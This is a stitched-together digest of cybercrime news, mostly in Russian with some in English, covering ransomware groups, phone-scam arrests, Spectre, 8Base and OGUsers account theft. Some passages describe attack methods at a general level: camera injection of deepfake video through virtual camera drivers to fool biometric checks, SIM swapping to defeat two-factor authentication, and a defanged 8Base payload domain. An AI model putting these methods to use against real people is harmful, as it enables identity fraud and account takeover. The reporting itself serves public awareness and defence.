В кругу исследователей считается, что вымогатели Royal, активные с сентября 2021 года, действуют как закрытая группа, а не как поставщик RaaS. Прежде чем разработать свой собственный шифровальщик, Royal использовала готовые варианты.
У группы нет каких-либо явных предпочтений по сектору или размеру атакуемой организации. Эти хакеры без колебаний шифруют данные любых организаций ( и даже целых городов ), удаляют учётные данные, распределяются по всему домену системы и шифруют конечные устройства.
Набор инструментов группы состоит из фишинговых писем с вредоносными вложениями или ссылками, украденных паролей, хакерских инструментов для доступа к сетям жертв, вредоносной рекламы и т.п. Группа также часто использует инструмент Cobalt Strike для поддержания своего постоянства в системе жертв.
Akira – 12,26% наблюдаемых случаев
Это относительно новая банда, первая вымогательская атака которой произошла в начале апреля 2023 года. Однако многие эксперты уверены, что группировка образована выходцами из знаменитой Conti.
Группа быстро накапливала жертв в течение первой половины 2023 года. Нацеливается Akira в основном на образовательный сектор, сферу профессиональных услуг, розничную торговлю, гостиничный бизнес, здравоохранение и производственные организации, в первую очередь в Канаде и США.
Группировка отличается своей гибкостью в ведении переговоров, обычно предлагая своим жертвам сразу несколько вариантов урегулирования вопроса. А сайт утечки группировке выполнен в интересной ретро-стилистике .
Дешифратор Akira не отличается высокой надёжностью, исследователи из Avast в конце июня даже выпустили дешифратор . Однако группа определённо находится только в начале своего пути, рано или поздно она доработает своё программное обеспечение.
Что в сухом остатке?
Какая бы хакерская группировка не стояла во главе вымогательской отрасли, само по себе вымогательство продолжает оставаться одной из наиболее опасных и прибыльных форм киберпреступности.
Несмотря на совершенствование защитных методов и возможностей восстановления данных, ущерб от подобных атак по-прежнему колоссален. Чтобы эффективно противостоять подобным угрозам, организации должны внедрять комплексный подход к обеспечению кибербезопасности, включающий регулярное резервное копирование, сегментацию сети, обучение персонала, использование современных средств защиты и мониторинга.
Только так можно минимизировать риски и уберечь бизнес от разорительных последствий атак вымогателей.
Технологии идут вперёд также, как и способы обхода систем аутентификации.
Технологии биометрической идентификации набирают популярность среди компаний, стремящихся обеспечить быстрый и надежный процесс аутентификации. Однако, как предупреждает Стюарт Уэллс, технический директор компании Jumio, специализирующейся на биометрической аутентификации, возрастает риск обхода таких систем мошенниками.
По прогнозам Европола, к 2026 году до 90% онлайн-контента может быть сгенерировано искусственно, что создает проблемы для точной идентификации пользователей.
Уэллс описывает технику под названием Camera injection (инъекция, внедрение камеры), которая позволяет внедрить в систему deepfake-видео и обмануть инструменты биометрической идентификации. Camera injection происходит, когда злоумышленник внедряет сигнал в ПЗС-датчик (прибор с зарядовой связью, charge- coupled device, CCD, ПЗС) изображения камеры, чтобы искажать или подменять захваченное изображение, и вводит в систему предварительно записанный материал или потоковое видео с заменой лица в реальном времени, созданное с помощью технологии deepfake.
Предварительно записанный контент может представлять собой реальное видео жертвы либо видеоролик, в котором лицо жертвы каким-либо образом изменено, или полностью сгенерированное лицо.
Обход прямой трансляции, которую обычно захватывает ПЗС-матрица настоящей камеры, осуществляется несколькими способами. Один из них — взломать драйвер устройства реальной камеры и ввести видеопоток на более низкий уровень драйвера устройства. Более распространенным способом внедрения камеры является наличие драйвера устройства виртуальной камеры, который просто передает в систему предварительно записанный или сгенерированный в реальном времени видеопоток, представляя его как изображение с реальной камеры.
Поскольку видео представляет собой серию неподвижных изображений, мошенник иногда вставляет одно и то же изображение в каждый кадр видеопотока. В результате получается видеопоток, в котором нет движения. Более сложный метод, но и более трудоемкий для мошенников, — это изменение или фабрикация видеоряда, в котором присутствует движение. Самый сложный метод заключается в том, что дипфейком можно манипулировать в режиме реального времени для выполнения действий, запрошенных интегрированной системой просмотра данных.
Основная опасность внедрения заключается в том, что, если мошенник успешно внедрит такое видео, он может оставаться незамеченными. Подобные действия могут привести к краже личных данных, созданию фальшивых аккаунтов и проведению мошеннических операций.
По мнению Уэллса, для обеспечения безопасности необходимо реализовать механизмы для определения случаев компрометации драйверов камеры и распознавания манипуляций путем сравнения естественного движения с движениями на записанных видео.
Встроенный акселерометр, который реагирует на движение по осям, также может быть использован для отслеживания изменений объектов на записанном видео и определения того, подверглась ли камера взлому.
Среди других методов – сравнение таких параметров как ISO, диафрагма, частота кадров и изменения в освещенности, которые могут выдать подделку. Дополнительно, с помощью анализа отдельных кадров видео можно обнаружить признаки манипуляции, такие как дважды сжатые части изображения или следы deepfake-изображений.
Расследование трат на кибербезопасность раскалывает власти Саффолка.
Округ Саффолк, штат Нью-Йорк, одобрил выделение $25,7 миллионов на восстановление после одной из самых разрушительных кибератак на муниципалитет в США.
Атака 8 сентября 2022 года группа ALPHV BlackCat парализовала критические системы, раскрыла личные данные около 470 000 жителей и 26 000 сотрудников, и вывела из строя полицейские службы на несколько недель. Были затронуты платежные системы, доступ к общественным записям и онлайн-тестированию, основной сайт округа не работал несколько месяцев. Некоторые чиновники утверждают, что последствия атаки ощущаются до сих пор.
Бывший исполнительный директор округа Стивен Беллоне объявил 16 месяцев чрезвычайного положения после атаки, что позволило округу приостановить обычный процесс торгов для госконтрактов.
Хотя окончательная сумма расходов на кибератаку еще подсчитывается, власти округа оценивают затраты в $25,7 миллиона, включая контракты до конца 2024 года. Контролер округа Джон Кеннеди ранее обвинил администрацию Беллона в том, что она потратила $13,8 миллиона на продукты, которые либо не были нужны, либо никогда не использовались.
Новый исполнительный директор округа Эдвард П. Ромейн ищет способы вернуть часть средств. Ромейн критиковал подписание многолетних контрактов предыдущей администрацией в период перехода власти.
Прокурор округа Рэй Тирни начал расследование по обвинениям в уничтожении документов в последние дни правления Беллона. Однако Беллон утверждает, что все резервные копии данных были восстановлены или перестроены, и округ не заплатил выкуп вымогателям.
$25,7 миллиона не включают тысячи часов сверхурочной работы сотрудников различных департаментов после атаки, как отметил Кеннеди, а также другие не связанные с технологией услуги, включая более $1 миллиона на юридические расходы и расследование кибератаки. По данным анализа округа, значительная часть расходов ($8,1 миллиона) была направлена компании Palo Alto Networks за поддержку систем и на криминалистические расследования.
Законодательный отчет о кибератаке ожидается в ближайшие недели, хотя он, вероятно, будет больше сосредоточен на причинах атаки и эффективности ответа, чем на затратах. Ромейн заявил о необходимости специального комитета для расследования расходов и выразил свое желание потратить $26 миллионов на укрепление текущих систем безопасности, чтобы округ мог претендовать на киберстрахование, которое предоставляется только при наличии должного уровня защиты и соответствующих мер безопасности.
newsday.com/long-island/suffolk/suffolk-cyberattack-ulul94lm
16 октября т.г. в 21:56 часов в дежурную часть ОМВД России по Хангаласскому району поступил телефонный звонок. Детский голос сообщил, что его родители разговаривают с кем-то по телефону и отправили незнакомым 350 000 рублей, оформив кредит.
На адрес в ближайшем поселке был незамедлительно направлен участковый уполномоченный полиции, который провел с потерпевшими беседу.
Оказалось, что ребенок своим звонком в полицию спас родителей от большого долга.
Если обо всем по порядку, что в тот день пятиклассник обратил внимание на странное поведение родителей, они были чем-то встревожены и иногда о чем-то спорили. Мальчик прислушался и выяснил, что к отцу поступили подозрительные звонки через мессенджер.
Сперва 44-летнему мужчине сообщили, что истек срок договора по абонентскому номеру оператора сотовой связи, а затем о взломе личного кабинета в приложении «Госуслуги» и якобы теперь неизвестные оформляют кредит от его имени. Злоумышленники, действовавшие под видом банковских сотрудников, потребовали от мужчины опередить мнимого преступника: побыстрее кредитоваться самому и все деньги направить на «безопасный счет».
Услышав такое, сын пытался остановить родителей, умолял их не совершать ошибку, но они его не слушали и успели направить на счета дистанционных мошенников 175 000 рублей собственных сбережений. Испугавшись, что родители продолжат совершать финансовые манипуляции под диктовку преступников и уже пытаются оформить кредиты, 11-летний сын решился на звонок в полицию.
Мальчику и участковому уполномоченному полиции удалось остановить дальнейшие переводы денежных средств на преступные счета.
Школьник пояснил полицейскому, что неоднократно читал и слышал предупреждения об активности мошенников в сети Интернет.
Руководством ОМВД России по Хангаласскому району принято решение о поощрении любящего сына и бдительного юного гражданина.
мвд.рф/news/item/56258871/
Хакеры стали чаще проводить атаки с помощью программ-шифровальщиков с целью вывода из строя компьютерных систем в России без возможности восстановления даже за выкуп, сообщили РИА Новости в компании по управлению цифровыми рисками BI.ZONE.
"Активность шифровальщиков не утихает последние несколько лет, и мы видим появление все новых модификаций подобного вредоносного ПО. В большинстве случаев шифровальщики атакуют частные компании, но не обходят стороной и рядовых пользователей. Обычно такие злоумышленники имеют финансовую мотивацию, но последнее время мы все чаще фиксируем использование программ-вымогателей с целью вывода из строя компьютерных систем без возможности восстановления", - рассказал руководитель управления киберразведки BI.ZONE Олег Скулкин.
Одним из таких примеров, по его словам, является атака группы Key Wolf, которую эксперты компании обнаружили в марте. Злоумышленники распространяют файл с программой-шифровальщиком, которая кодирует все данные на компьютере. "Важная особенность в том, что у потерпевшего нет возможности дешифровать данные, даже за выкуп", - поясняется в сообщении.
Программа-шифровальщик Key Group шифрует данные на жестких дисках, ставит на рабочий стол иллюстрацию с логотипом группировки и выводит на экран сообщение на английском языке. "В нем говорится о цели атаки - уничтожить российские компьютеры. Мошенники предлагают помочь им в этом, а для этого требуется перевести деньги на их биткоин-кошелек", - рассказали в компании.
Чтобы защититься от вредоносных файлов, распространяемых по электронной почте, эксперты рекомендуют пользоваться специализированными решениями, которые блокируют спам и опасные письма.
https://www.bleepingcomputer[.]com/...s-identify-revil-ransomware-gang-core- member/
German investigators have identified a Russian man named Nikolay K. whom they
believe to be one of REvil ransomware gang's core members, one of the most
notorious and successful ransomware groups in recent years.
The man is presenting himself as a cryptocurrency investor and trader, but the
German authorities who been following him for months think otherwise after
tracking some of the Bitcoin payments he made over the years.
As reported by German media, the investigators were able to link Bitcoin
payments with ransoms paid to the GandCrab ransomware group, following attacks
against a software developer and the State Theater in Stuttgart.
The same sources claim that the investigators have found strong links between
REvil and GandCrab, something that has been suggested numerous times by
security researchers and analysts.
Nikolay K. didn’t hold back when it came to boasting on social media and
showcasing his holidays on the Mediterranean, posting images from lavish yacht
parties.
But he wasn’t careful enough when it came to hiding his true identity, falsely
assuming that masking his links to ransomware operations with crypto-
investment would be enough.
Инженеры Google
[опубликовали](https://security.googleblog.com/2021/03/a-spectre-proof-of-
concept-for-spectre.html) JavaScript-эксплоит, чтобы продемонстрировать
эффективность использование уязвимости Spectre в браузерах для доступа к
информации в памяти. Сообщается, что данный PoC-эксплоит работает с широким
спектром архитектур, операционных систем и поколений оборудования. Он на
практике доказывает, что защитные механизмы, которые разработчики добавили в
свои браузеры (например, изоляция сайтов, Cross-Origin, Cross-Origin Read
Blocking и так далее), фактически не работают.
Напомню, что оригинальная проблема Spectre (CVE-2017-5753) была обнаружена в 2018 году наряду с багом Meltdown. Эти фундаментальные недостатки в архитектуре современных процессоров позволяют легко нарушить изоляцию адресного пространства, прочитать пароли, ключи шифрования, номера банковских карт, произвольные данные системных и других пользовательских приложений в обход любых средств защиты и на любой ОС.
«Сегодня мы делимся proof-of-concept кодом, который подтверждает эффективность использования уязвимостей типа Spectre против JavaScript- движков. Мы используем Google Chrome для демонстрации нашей атаки, но эти проблемы специфичны не только для Chrome, и мы полагаем, что другие современные браузеры тоже уязвимы для этого вектора эксплуатации», — пишут специалисты Google.
Click to expand...
Эксперты создали специальную интерактивную демонстрацию атаки на сайте leaky.page, а также опубликовали подробное описание своей работы на [GitHub](https://github.com/google/security-research- pocs/tree/master/spectre.js) .
Ниже можно увидеть ролик, показывающий успешную атаку с использованием эксплоита Google на машину на базе Intel i7-6500U, под управлением Ubuntu и с Chrome 88 на борту.
В Google считают, что разработчики должны использовать для защиты от Spectre и других cross-site атак новые механизмы безопасности. Помимо стандартных средств защиты, таких как [X-Content-Type- Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content- Type-Options)[ ](https://developer.mozilla.org/en- US/docs/Web/HTTP/Headers/X-Content-Type-Options)и [X-Frame- Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame- Options) , в Google рекомендуют применять:
- [Cross-Origin Resource Policy](https://developer.mozilla.org/en-
US/docs/Web/HTTP/Headers/Cross-Origin-Resource-Policy) (CORP) и [Fetch
Metadata Request Headers](https://developer.mozilla.org/en-
US/docs/Glossary/Fetch_metadata_request_header) ;
- [Cross-Origin Opener Policy](https://developer.mozilla.org/en-
US/docs/Web/HTTP/Headers/Cross-Origin-Opener-Policy) (COOP) ;
- [Cross-Origin Embedder Policy](https://developer.mozilla.org/en-
US/docs/Web/HTTP/Headers/Cross-Origin-Embedder-Policy) (COEP).
Кроме того, инженеры Google создали для Chrome расширение под названием Spectroscope, которое должно помочь ИБ-специалистам и разработчикам защитить свои сайты от Spectre. Расширение сканирует веб-приложения в поисках ресурсов, где может потребоваться включение дополнительных средств защиты.
Отметим, что ранее в этом месяце французский ИБ-специалист Жюльен Вуазен (Julien Voisin) обнаружил на VirusTotal «боевые» эксплоиты для уязвимости Spectre, нацеленные на Windows и Linux.
Источник:https://xakep.ru/2021/03/15/spectre-poc/
Сотрудники уголовного розыска подмосковного Наро-Фоминска разыскали пособника телефонных мошенников, оставивших пожилую женщину без крупной суммы денег. Деньги аферистов обналичивал 19-летний житель Казани, рассказали в пресс- службе ГУ МВД по Московской области.
В полицию с заявлением о дистанционном мошенничестве обратилась 69-летняя жительница Наро-Фоминского городского округа.
Неизвестные представились сотрудниками правоохранительных органов и заявили пенсионерке о попытке оформления кредита от ее имени. Они убедили напуганную женщину оформить заем и перевести деньги якобы на безопасные счета. Пожилая женщина перечислила более 2,5 млн руб. Позднее поняла, что имела дело с мошенниками.
Оперативники выяснили, что похищенные деньги были обналичены в Казани. В ходе служебной командировки в столицу Татарстана они задержали молодого человека, который снял средства с нескольких банковских карт.
Юноша нашел такую криминальную работу через интернет. Он получал чужие банковские карты через курьеров или тайник. Обналиченные деньги переводил на третьи счета. За каждое задание парень получал по 5 тыс. руб.
Возбуждено уголовное дело. Пособник мошенников находится под стражей. Устанавливается его причастность к аналогичным преступлениям.
Сотрудники Управления по борьбе с противоправным использованием информационно- телекоммуникационных технологий ГУ МВД России по г. Санкт-Петербургу и Ленинградской области задержали 27-летнего жителя Ленобласти, исполнявшего в криминальной схеме дистанционных мошенников роль посыльного за деньгами жертв обмана.
Предварительно установлено, что злоумышленник, действуя по указанию неустановленных кураторов, приходил домой к жителям Санкт-Петербурга, которым ранее поступали звонки якобы от сотрудников правоохранительных органов. Телефонные аферисты убеждали граждан, что их сбережения находятся в опасности, и денежные средства необходимо перечислить на «безопасный счет».
Задержанный приезжал на встречу с потерпевшими со специальным электронным считывателем, посредством которого осуществлялись финансовые транзакции на счета мошенников.
После задержания помощника аферистов полицейские провели обыск в его квартире на Английской улице в поселке Бугры Всеволожского района Ленобласти, где обнаружили и изъяли 4 банковские карты, мобильные телефоны с перепиской, изобличающей противоправную деятельность злоумышленника, а также NFC- считыватели.
Следственным управлением УМВД России по Выборгскому району г. Санкт-Петербурга возбуждено уголовное дело по признакам преступления, предусмотренного ч. 4 ст. 159 Уголовного кодекса Российской Федерации. Мужчине избрана мера пресечения в виде заключения под стражу. Он подозревается в совершении пяти противоправных деяний на сумму свыше 1,5 млн рублей.
Полицейские проводят дальнейшие оперативно-розыскные мероприятия, направленные на установление всех участников криминальной схемы, а также дополнительных эпизодов их преступной деятельности.
В Бресте задержали парня за незаконную торговлю криптой. Оказалось, что он промышлял еще и кражей логинов-паролей.
Сотрудники управления "К" установили 21-летнего жителя областного центра, который занимался незаконной предпринимательской деятельностью, связанной с оборотом криптовалюты. Установлено, что с мая по сентябрь 2023 года парень с использованием вирусов получал доступ к аккаунтам социальных сетей, после чего продавал их в даркнете.
Полина Коденская, старший инспектор ГИОС Ленинского РОВД Бреста:
Денежные средства за проделанную работу последний получал через криптокошелек. Нелегальный оборот составил около 41 тыс. рублей. Составлен административный протокол за незаконную предпринимательскую деятельность. Санкцией статьи предусмотрен крупный штраф и обращение в доход государства всей прошедшей через криптокошелек суммы.
Вымогатель 8Base, который существует более года, но обычно был практически незаметен, перешел к массовым атакам в мае и июне 2023 года, [сообщают](https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy- hitting-player) эксперты VMware Carbon Black. По информации исследователей, только в июне операторы малвари взломали более 30 малых предприятий.
8Base впервые попал в поле зрения исследователей в марте 2022 года, но после этого оставался практически неактивным. Ситуация изменилась в июне 2023 года, когда активность малвари резко возросла, и злоумышленники атаковали множество компании в самых разных отраслях. В общей сложности на сегодня 8Base скомпрометировала около 80 организаций в таких отраслях, как автомобилестроение, бизнес-услуги, строительство, финансы, здравоохранение, гостиничный бизнес, ИТ, производство и недвижимость.
На данный момент на сайте 8Base в даркнете перечислены 35 жертв, причем в некоторые дни группировка сообщала о взломе до шести компаний за раз. Это делает 8Base одним из самых активных вымогательских вредоносов последних месяцев.
[](https://xakep.ru/wp- content/uploads/2023/06/428153/activity.jpg)
Эксперты VMware Carbon Black полагают, что 8Base – это ребрендинг известной вымогательской группировки RansomHouse, которая ранее брала на себя ответственность за взлом компаний [ADATA](https://xakep.ru/2022/10/10/adata- ransomhouse/) и AMD.
Исследователи видят связь между этими группами, основываясь на практически идентичных записках с требованием выкупа, а также на сходстве языка и содержимого сайтов хакеров (даже страницы FAQ, похоже, просто скопировали и перенесли с одного сайта на другой).
[](https://xakep.ru/wp- content/uploads/2023/06/428153/faqs.jpg)
Основное различие между двумя вымогателями заключается в том, что RansomHouse открыто набирает партнеров, то 8Base — нет.
С технической точки зрения 8Base представляет собой кастомную версию малвари Phobos v2.9.1, которая загружается через SmokeLoader. Phobos — это ориентированная на Windows RaaS-малварь, которая впервые появилась в 2019 году, а ее код схож с вымогателем Dharma. В ходе шифровании вымогатель добавляет расширение .8base к пострадавшим файлам.
Еще одно интереснее открытие аналитиков VMware: 8Base использует домен admlogs25[.]xyz для размещения полезной нагрузки. Этот домен связан с прокси- малварью [SystemBC](https://www.proofpoint.com/us/threat- insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits), которую вымогательские группировки используют для обфускации C&C.
«Является ли 8Base ответвлением Phobos или RansomHouse, еще только предстоит выяснить. Интересно, что 8Base практически идентична RansomHouse, но использует вымогательское ПО Phobos. Этим летом 8Base стала одной из самых активных вымогательских групп», — резюмируют специалисты VMware.
Click to expand...
Пресс-служба УФСБ России по Владимирской области рассказала местным телевизионщикам о судьбе пособника криминальной группировки FIN7, которого им удалось выявить и передать в руки правосудия. В прошлом месяце 36-летнему программисту, облегчившему ограбление банков по всему миру, был вынесен приговор — на удивление мягкий, всего один год, да и то условно.
Согласно материалам дела, в период с сентября 2016 года по май 2018-го предприимчивый житель Владимира разработал ряд инструментов для взлома банковских систем и кражи денежных средств, а затем через интернет начал сдавать их в аренду.
Незаконное предпринимательство привлекло внимание блюстителей правопорядка, и в феврале 2019 года по факту создания и распространения вредоносных программ (ст. 273 УК РФ) было возбуждено уголовное дело. В ходе следствия подтвердилось еще одно интересное обстоятельство — причастность обвиняемого к дерзким налетам на банки и ритейл, которые совершала преступная группа FIN7, она же Carbanak.
По совокупности вирусописателю грозило до пяти лет лишения свободы. В октябре этого года Фрунзенский районный суд Владимира признал вирусописателя виновным и назначил наказание — один год лишения свободы условно с испытательным сроком один год.
Американские власти тоже прилагают усилия для пресечения деятельности хакерского интернационала по имени FIN7, и их успехи пока ярче. В этом году в США вынесли два приговора участникам данной ОПГ — в апреле и июне. Оба осужденных — украинцы; один получил 10 лет, другой — семь, в обоих случаях с отбыванием наказания за решеткой.
U.S. federal prosecutors have charged John McAfee, founder of cybersecurity
firm McAfee, and his executive advisor Jimmy Gale Watson Jr for cryptocurrency
fraud and money laundering.
In total, McAfee, Watson, and other members of the McAfee Team were able to
collect over $13 million from two cryptocurrency pump-and-dump schemes,
according to court documents.
Between December 2017 and January 2018, they netted more than $2 million in illicit profits via altcoin scalping, a fraudulent practice known as a 'pump and dump' scheme.
From December 2017 through 2018, they earned roughly $11 million by running a parallel scheme being paid to promote the initial coin offerings (ICOs) of multiple startups while concealing the payments they receive from ICO investors.
Between December 2017 and October 2018, McAfee, Watson, and another team member also laundered the digital asset proceeds stemming from the scalping and ICO touting schemes.
"The defendants allegedly used McAfee's Twitter account to publish messages to hundreds of thousands of his Twitter followers touting various cryptocurrencies through false and misleading statements to conceal their true, self-interested motives," Manhattan U.S. Attorney Audrey Strauss said.
"McAfee, Watson, and other members of McAfee's cryptocurrency team allegedly raked in more than $13 million from investors they victimized with their fraudulent schemes."
They were charged in a seven-count indictment, with each count carrying maximum potential sentences of between five and 20 years in prison.
The U.S. Securities and Exchange Commission (SEC) has also filed civil charges against McAfee in a separate enforcement action.
He was indicted for being paid over $23 million in digital assets while
pretending to be impartial and independent of the ICOs he was promoting.
"McAfee, assisted by Watson, allegedly leveraged his fame to deceptively tout
numerous digital asset securities to his followers without informing investors
of his role as a paid promoter," said Kristina Littman, SEC Cyber Unit Chief,
at the time.
McAfee was arrested and is currently being detained in Spain on separate tax evasion charges filed by the US Justice Department's Tax Division last year.
The action centres around the OGUsers community. It is highly unusual for
social media companies to publicly announce that it has identified the real
names of pseudonymous users.
Instagram is taking aggressive action against members of the so-called OGUsers
community, which hack, extort, and scam their way to controlling high profile,
and high value, usernames across a spectrum of apps and social media networks.
Instagram told Motherboard it had unmasked the real identities of multiple
people involved in the trade of these usernames, disabling a number of
accounts the scammers had stolen, and sent cease and desist letters to people
it had identified.
The news signals an escalation from tech companies towards a subsection of the
cybercrime world that has run amok for years, and which has steadily been
getting more audacious in its tactics. TikTok and Twitter told Motherboard it
has also taken some action around OGUsers. It is highly unusual for social
media companies to publicly announce that it has identified the real names of
pseudonymous users and to announce publicly that it has sent them legal
threats.
The cease and desist lays out how the recipient has violated Instagram's
terms, demands that they stop all activity on the company's platforms, and
requires a response within 48 hours, Instagram told Motherboard. The letter
also demands that the recipient provide information to Instagram about others
who are involved in the activity, and says that the company may take
additional measures if the person ignores the cease and desist, Instagram
added.
Instagram told Motherboard it was disabling hundreds of high value accounts
obtained and sold by OGUsers members. This includes accounts belonging to
middlemen, who act as a third party between buyer and seller to ensure no one
is scammed and take a cut of the sale, and swappers who move the high value
usernames over to fresh Instagram accounts out of the reach of their original
owners.
"Middleman Service; fast; always available," one middleman writes on the
OGUsers forum.
"Sorry, this page isn't available," a message on the now disabled profiles
reads.
One of the accounts Instagram disabled belonged to an OGUsers middleman who
used the handle Farzad.
"There is incorrect information. I'm being associated with bad people just
because they're on the website that I use too," they told Motherboard in an
online chat. "I help people deal safely, that's all," they added, tacitly
acknowledging their role as a middleman. They also said that they were
"speaking with their lawyer this afternoon."
One user on the OGUsers forum who goes by the username waah wrote in a forum
post after Instagram’s action "Everyone who buys, sells, or provides services
relating to Facebook products (aka Instagram) please delete your threads and
com accounts. I got a lawsuit on my hands so I closed my services, and my
Instagram got banned after I got a Cease and Desist Order. again, please be
careful guys."
A spokesperson for Facebook, which owns Instagram, said that the company has
taken similar enforcement actions against OGUsers members before, but this is
the first time they are doing so publicly. The company says it is doing this
in part to show that this sort of behavior violates the site's terms of
service, but also to highlight the real harms members of the community are
causing.
[Motherboard first published](https://www.vice.com/en/article/vbqax3/hackers-
sim-swapping-steal-phone-numbers-instagram-bitcoin) an in-depth investigation
into the OGUsers forum in 2018, which showed that members sold social media
and gaming handles sometimes for thousands of dollars each. For years, members
of the forum and the nebulous community around it have deployed SIM swapping
techniques to steal these usernames. SIM swapping is where a hacker will take
over a target's phone number, perhaps by social engineering or
[bribing](https://www.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-
employees-sim-swapping-port-out-scam) a telecom's employees, or, [as
Motherboard has found](https://www.vice.com/en/article/5dmbjx/how-hackers-are-
breaking-into-att-tmobile-sprint-to-sim-swap-yeh), deploying malware inside
the telecoms' systems themselves. The hacker can then use this access to
request a password reset or defeat the website's two-factor authentication
protections and take over the account depending on the particular service
targeted.
Instagram said that while SIM swapping and phishing do remain popular, its
teams have also observed a rise in other methods, including the use of
sextortion, swatting, extortion, and offline and online harassment that
scammers are using to obtain usernames. With sextortion, hackers will gain
access to a target's email or cloud storage accounts, comb them for intimate
photos, and then use those to blackmail the victim into handing over a
valuable username, a Facebook spokesperson explained.
The swappers who move Instagram handles from one account to another are also
using automated tools to quickly grab available usernames before others can
claim them, Instagram said.
Facebook spokespeople declined to elaborate on what specific methods they used
to identify the people behind certain account takeovers and sales, but said at
least some of it involved open source intelligence (OSINT) collection. This is
generally where researchers, journalists, law enforcement, or a company pieces
together bits of information spread across different sites or services to
identify or locate a particular person. Facebook and Instagram also likely
have access to a large amount of user-related data such as IP addresses.
Other tech companies also took action against the OGUsers community recently.
A TikTok spokesperson told Motherboard in a statement "As part of our ongoing
work to find and stop inauthentic behavior, we recently reclaimed a number of
TikTok usernames that were being used for account squatting. We will continue
to focus on staying ahead of the ever-evolving tactics of bad actors,
including cooperating with third parties and others in the industry."
In a statement, a Twitter spokesperson said "We permanently suspended a number
of Twitter accounts included in the network you referenced under our [platform
manipulation and spam policy](https://help.twitter.com/en/rules-and-
policies/platform-manipulation)." Twitter added that some of the accounts had
high follower counts and/or short, unique handles; traits that are
particularly valuable to OGUsers members.
A Facebook spokesperson said that the companies are not coordinating on
decisions to enforce, but the Facebook threat intelligence teams and those
from the other companies regularly talk about threats, including what
techniques hackers may be using. The Twitter spokesperson added in their
statement that "I can confirm that this investigation was done in tandem with
Facebook."
Instagram said that it is also collaborating with local law enforcement
agencies and governments to hold people accountable for crimes it sees on the
social network. Law enforcement agencies have [increasingly investigated
members of the OGUsers
community](https://www.vice.com/en/article/a3q7mz/hacker-allegedly-stole-
millions-bitcoin-sim-swapping), although typically when members move onto
stealing bitcoin or other funds from victims.
One of the Facebook spokespeople said that OGUsers requires a wider societal
response though, considering that many of the perpetrators are young.
[Hackers have targeted the OGUsers
forum](https://www.vice.com/en/article/bj97nd/infamous-forum-for-instagram-
hackers-gets-hacked-by-other-hackers) itself multiple times, with law
enforcement then [using some of the dumped
database](https://www.zdnet.com/article/how-the-fbi-tracked-down-the-twitter-
hackers/#:~:text=Per%20court%20documents%2C%20the%20FBI,after%20the%20forum%20got%20hacked.)
in prosecutions.
Although not always specifically related to OGUsers, Instagram users have
often had issues regaining access to their hacked account due to lackluster
support from Instagram, and have instead [had to rely on white-hat hackers to
help](https://www.vice.com/en/article/59vnvk/hacked-instagram-influencers-get-
accounts-back-white-hat-hackers).
Полиция Южной Кореи сообщила, что неизвестный YouTube-блогер управлял фальшивой инвестиционной компанией и побуждал корейцев вкладывать средства в бесполезные токены.
В период с конца 2021 года по март 2023 года мошенники якобы изъяли у жертв более 232 миллионов долларов.
Полиция Южной Кореи арестовала 215 человек в ходе расследования предполагаемого мошенничества с инвестициями в Криптовалюта на сумму 325,6 млрд вон (232 млн долларов США), сообщает Yonhap .
Подразделение по борьбе с коррупцией и экономическими преступлениями полицейского управления провинции Кёнгидо заявило, что среди арестованных были сотрудники фальшивой инвестиционной консалтинговой фирмы и неопознанный YouTube-блогер с 620 000 подписчиками. Кёнгидо — южнокорейская провинция, окружающая столицу Сеул.
В период с декабря 2021 года по март прошлого года эта схема якобы обманула более 15 000 человек, обещая высокую прибыль от инвестиций в виртуальные активы. Нацеленная в основном на людей среднего и старшего возраста, она обещала 20-кратную прибыль и побуждала людей продавать свои квартиры и брать кредиты для финансирования инвестиций.
Сами инвестиции включали 28 различных токенов, шесть из которых были созданы группой. Остальные 22 имели низкие объемы торговли и были определены как имеющие небольшую ценность.
Двенадцать арестованных остаются под стражей, включая YouTuber, который также возглавлял консалтинговую фирму. Сначала он бежал из Южной Кореи в Австралию через Гонконг и Сингапур.
В отчете не приводятся имена причастных к инциденту лиц.
yna.co.kr/view/AKR20241113082800061?input=1195m
Как стало известно “Ъ”, Гагаринский суд Москвы вынес обвинительный приговор по делу бывших менеджеров из Санкт-Петербурга Евгения и Дмитрия Попелышей, а также трех их подельников. Суд признал подсудимых виновными в хищении денежных средств со счетов физических лиц путем блокирования подключения клиентов к реальному сетевому адресу Сбербанка и ВТБ24, в том числе к системе ДБО «Сбербанк ОнЛ@йн» и ДБО «Телебанк». С помощью вредоносных программ подсудимые, по подсчетам следствия, похитили более 720 тыс. руб. За это братьев Попелыш суд приговорил к семи годам лишения свободы каждого, Шарычева — к четырем годам колонии, однако с учетом времени, проведенного в СИЗО и под домашним арестом, они были освобождены от наказания. Другие их подельники получили условные сроки.
На рассмотрение этого уголовного дела в Гагаринском суде Москвы ушло почти полтора года. Само же расследование было начато 28 декабря 2013 года полицейскими следователями Ленинского района Ижевска. Сначала дело возбудили по ч. 2 ст. 158 УК РФ (кража с причинением значительного ущерба гражданину). В марте 2019 года материалы дела забрал в свое производство следственный департамент МВД. Через месяц обвинение фигурантам — братьям Попелыш, Даниилу Шарычеву, занимавшемуся, по версии следствия, подбором клиентов и получением реквизитов их банковских карт, программисту Петру Бельскому и Александру Сарбину, предполагаемому создателю в сети фальшивых страниц кредитных учреждений, было переквалифицировано на ч. 4 ст. 159.6 УК РФ (мошенничество в сфере компьютерной информации в составе организованной группы), ч. 2 и 4 ст. 273 УК РФ (создание, использование и распространение вредоносных компьютерных программ группой лиц по предварительному сговору) и ч. 3 ст. 272 УК РФ (неправомерный доступ к компьютерной информации).
По версии следствия, братья Попелыш вместе с сообщниками занимались блокировкой подключений к реальному сетевому адресу системы ДБО Сбербанка «Сбербанк ОнЛ@йн», ДБО «Телебанк», перенаправляя все запросы клиентов на подключение к системе ДБО через фишинговый сайт с помощью приобретенных ими вредоносных программ Patchet.Ib и Qhost.
